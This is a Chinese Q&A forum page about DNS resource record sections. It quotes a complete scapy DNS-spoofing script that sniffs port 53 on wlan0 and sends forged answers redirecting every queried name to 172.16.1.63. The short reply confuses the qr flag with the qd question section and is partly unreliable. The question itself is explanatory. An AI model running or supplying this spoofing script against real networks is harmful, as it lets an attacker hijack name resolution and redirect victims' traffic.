代码之家 › 专栏 › 技术社区 › Merk

DNS数据包中不同类型的资源记录块的功能是什么?

scapy dns networking

Merk · 技术社区 · 7 年前

我知道资源记录部分的结构,它是这样的: enter image description here

但是当我阅读dns欺骗插件的源代码时,我完全迷失了方向:

    from scapy.all import *
def dns_spoof(pkt):
    redirect_to = '172.16.1.63'
    if pkt.haslayer(DNSQR): # DNS question record
        spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                      UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                      DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa = 1, qr=1, \
                      an=DNSRR(rrname=pkt[DNS].qd.qname,  ttl=10, rdata=redirect_to))
        send(spoofed_pkt)
        print 'Sent:', spoofed_pkt.summary()
sniff(filter='udp port 53', iface='wlan0', store=0, prn=dns_spoof)

QD和RRs之间有什么区别?为什么我们必须在这个数据包中使用QD?

1 回复 | 直到 7 年前

Merk 7 年前

DNS qr应解释为客户端发送的查询数据。Scapy使用DNSQR字段来表示此结构。因此,更容易将qr部分与其他RR字段分离。

推荐文章

Francesco Cheinasso · NFTABLES:如何在POSTROUTING中进行DNAT

3 年前

Ian Newson · 协议缓冲区、C#和网络流:永远不会收到消息

3 年前

Evantoki Alfa · 线程“main”java中出现异常。lang.ArrayIndexOutOfBoundsException:演示时为0。查找。main(Lookup.java:19)

3 年前

isaac kiplagat · 在reac native中使用sectionlist/flatlist显示父级和两个子级的json数据

3 年前

ê¹ì¼í · 如何发送带有引号的关键数据的POST方法?

3 年前

TiDu · 使用EKS设置出口网关的最简单方法,无需Istio

3 年前

Nop · 无法关闭键盘中断(Python)上的套接字连接

3 年前

scoulomb · OpenShift路由可从PAAS外部访问,但不能从PAAS内部的客户端访问

7 年前

Aaron Bratcher · 如何判断URL请求中的数据何时开始到达?

7 年前

Joe N · 您可以使用python套接字进行docker容器通信吗?

7 年前